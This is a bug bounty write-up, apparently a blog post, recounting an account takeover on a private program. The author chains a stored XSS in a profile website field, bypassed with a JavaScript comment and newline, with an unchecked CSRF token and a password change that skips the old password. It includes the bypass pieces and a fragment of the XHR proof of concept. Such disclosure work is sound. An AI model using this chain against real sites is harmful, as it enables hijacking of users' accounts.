Hello 😀 Everyone,
It had been a long time since I got a good bug and a bounty too :3 so after an OWASP meet where I met many leet bounty hunters I felt so much motivated, to do a bug hunt.I started poking around and all , so this is a story of a simple Full Account Takeover on a h1 private site
||Cross-Site Request Forgery (CSRF),Cross-Site Scripting (XSS)
1. Stored XSS(Required Interaction)
// – Begins a single line comment in js
https://google.com/?aaaa – comment itself
%0a – Intiate a new line which ends the single line comment
so It got updated on my profile. But it required Victim to click on Attacker’s website by sending him the Attacker’s profile page which was publicly accessible so thats how i got a simple XSS with easy bypass. Now I decided to go further before reporting and I played around a little more and I Found that in “Change Password” functionality , they don’t ask for the user’s old password.Well that was pretty awesome to exploit 😀 with the XSS we found.
Even though i had a XSS I decided to check if an anti-CSRF token was there(which was not a need since we can grab the token with XSS using xhr). I thought if we could check if CSRF token is being validated on the server side so all I did was , removed the authenticity_token parameter from the form 😀 and boom! it got updated without it.
#.Full Account TakeOver
so Combining XSS and no confirmation check on user’s old password. I Created a POC Which takeover the victim’s account by just a click on Attacker’s profile’s Website. All We need is the victim should be logged into his account.
Earlier while Changing the password I saw that the form was submitted to an endpoint which had a unique user id which was not publicly known
so we just needed to grab userid and since the csrf token is not validated we don’t need to grab that.
So I made XHR Request to /account (various other end points also contained user_id in their source) to find the user_id(victim’s) and grabbed that and submitted the Password Change form with that user_id
var http=new XMLHttpRequest;
var parser=new DOMParser;
in the website url and updated my(attacker’s) profile.
Now all victim had to do was , to click on attacker’s website and BOOM! his password got changed to ‘my1337pass’.
I got a fair enough bounty :D.
Thanks to every awesome infosec people who share their knowledge.